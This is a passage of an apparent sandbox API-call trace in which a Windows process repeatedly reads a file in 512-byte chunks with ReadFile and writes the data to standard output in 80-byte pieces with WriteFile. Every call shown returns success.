lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.734] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.734] GetFileType (hFile=0x50) returned 0x1 [0207.734] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.734] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.734] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.734] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.734] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.734] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.734] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.734] GetFileType (hFile=0x50) returned 0x1 [0207.734] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.734] GetFileType (hFile=0x50) returned 0x1 [0207.734] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.734] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.734] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.734] GetFileType (hFile=0x50) returned 0x1 [0207.734] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.734] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.734] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.734] GetFileType (hFile=0x50) returned 0x1 [0207.734] _get_osfhandle (_FileHandle=1) returned 0x50 
[0207.734] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.735] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.735] GetFileType (hFile=0x50) returned 0x1 [0207.735] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.735] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.735] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.735] GetFileType (hFile=0x50) returned 0x1 [0207.735] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.735] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.735] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.735] GetFileType (hFile=0x50) returned 0x1 [0207.735] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.735] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.735] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.735] GetFileType (hFile=0x50) returned 0x1 [0207.735] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.735] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.735] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.735] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) 
returned 1 [0207.735] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.735] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.735] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.735] GetFileType (hFile=0x50) returned 0x1 [0207.735] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.735] GetFileType (hFile=0x50) returned 0x1 [0207.735] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.735] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.735] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.735] GetFileType (hFile=0x50) returned 0x1 [0207.735] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.735] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.735] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.735] GetFileType (hFile=0x50) returned 0x1 [0207.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.736] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.736] GetFileType (hFile=0x50) returned 0x1 [0207.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.736] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.736] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0207.736] GetFileType (hFile=0x50) returned 0x1 [0207.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.736] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.736] GetFileType (hFile=0x50) returned 0x1 [0207.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.736] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.736] GetFileType (hFile=0x50) returned 0x1 [0207.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.736] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.736] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.736] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.736] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.736] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.736] GetFileType (hFile=0x50) returned 0x1 [0207.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.736] GetFileType (hFile=0x50) returned 0x1 [0207.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.736] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.736] GetFileType (hFile=0x50) returned 0x1 [0207.736] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.737] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.737] GetFileType (hFile=0x50) returned 0x1 [0207.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.737] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.737] GetFileType (hFile=0x50) returned 0x1 [0207.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.737] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.737] GetFileType (hFile=0x50) returned 0x1 [0207.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.737] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.737] GetFileType (hFile=0x50) returned 0x1 [0207.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.737] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, 
lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.737] GetFileType (hFile=0x50) returned 0x1 [0207.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.737] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.737] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.737] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.737] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.737] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.737] GetFileType (hFile=0x50) returned 0x1 [0207.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.737] GetFileType (hFile=0x50) returned 0x1 [0207.737] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.737] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.738] GetFileType (hFile=0x50) returned 0x1 [0207.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.738] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.738] GetFileType (hFile=0x50) returned 0x1 [0207.738] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0207.738] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.738] GetFileType (hFile=0x50) returned 0x1 [0207.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.738] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.738] GetFileType (hFile=0x50) returned 0x1 [0207.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.738] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.738] GetFileType (hFile=0x50) returned 0x1 [0207.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.738] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.738] GetFileType (hFile=0x50) returned 0x1 [0207.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.738] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.738] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.738] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, 
dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.738] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.738] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.738] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.738] GetFileType (hFile=0x50) returned 0x1 [0207.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.739] GetFileType (hFile=0x50) returned 0x1 [0207.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.739] WriteFile (in: hFile=0x50, lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.739] GetFileType (hFile=0x50) returned 0x1 [0207.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.739] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.739] GetFileType (hFile=0x50) returned 0x1 [0207.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.739] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.739] GetFileType (hFile=0x50) returned 0x1 [0207.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.739] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, 
lpOverlapped=0x0) returned 1 [0207.739] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.739] GetFileType (hFile=0x50) returned 0x1 [0207.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.744] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.744] GetFileType (hFile=0x50) returned 0x1 [0207.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.744] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.744] GetFileType (hFile=0x50) returned 0x1 [0207.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.744] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.744] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.744] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.745] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.745] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.745] GetFileType (hFile=0x50) returned 0x1 [0207.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.745] GetFileType (hFile=0x50) returned 0x1 [0207.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.745] WriteFile (in: hFile=0x50, 
lpBuffer=0x12eb54*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.745] GetFileType (hFile=0x50) returned 0x1 [0207.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.745] WriteFile (in: hFile=0x50, lpBuffer=0x12eba4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12eba4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.745] GetFileType (hFile=0x50) returned 0x1 [0207.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.745] WriteFile (in: hFile=0x50, lpBuffer=0x12ebf4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ebf4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.745] GetFileType (hFile=0x50) returned 0x1 [0207.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.745] WriteFile (in: hFile=0x50, lpBuffer=0x12ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec44*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.745] GetFileType (hFile=0x50) returned 0x1 [0207.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.745] WriteFile (in: hFile=0x50, lpBuffer=0x12ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ec94*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.745] GetFileType (hFile=0x50) returned 0x1 [0207.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.745] WriteFile (in: hFile=0x50, lpBuffer=0x12ece4*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ece4*, lpNumberOfBytesWritten=0x12dd38*=0x50, lpOverlapped=0x0) returned 1 [0207.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.745] GetFileType (hFile=0x50) returned 0x1 [0207.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.745] WriteFile (in: hFile=0x50, lpBuffer=0x12ed34*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12dd38, lpOverlapped=0x0 | out: lpBuffer=0x12ed34*, lpNumberOfBytesWritten=0x12dd38*=0x20, lpOverlapped=0x0) returned 1 [0207.746] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.746] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12dd24 | out: lpNewFilePointer=0x0) returned 1 [0207.746] _get_osfhandle (_FileHandle=4) returned 0x58 [0207.746] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.746] _get_osfhandle (_FileHandle=1) returned 0x50 [0207.746] GetFileType (hFile=0x50) returned 0x1 [0207.746] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.746] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.746] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.746] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, 
lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.746] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.746] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.746] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.746] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.747] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.747] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.747] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.747] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: lpBuffer=0x12eb54*, lpNumberOfBytesRead=0x12dd44*=0x200, lpOverlapped=0x0) returned 1 [0207.747] ReadFile (in: hFile=0x58, lpBuffer=0x12eb54, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12dd44, lpOverlapped=0x0 | out: 
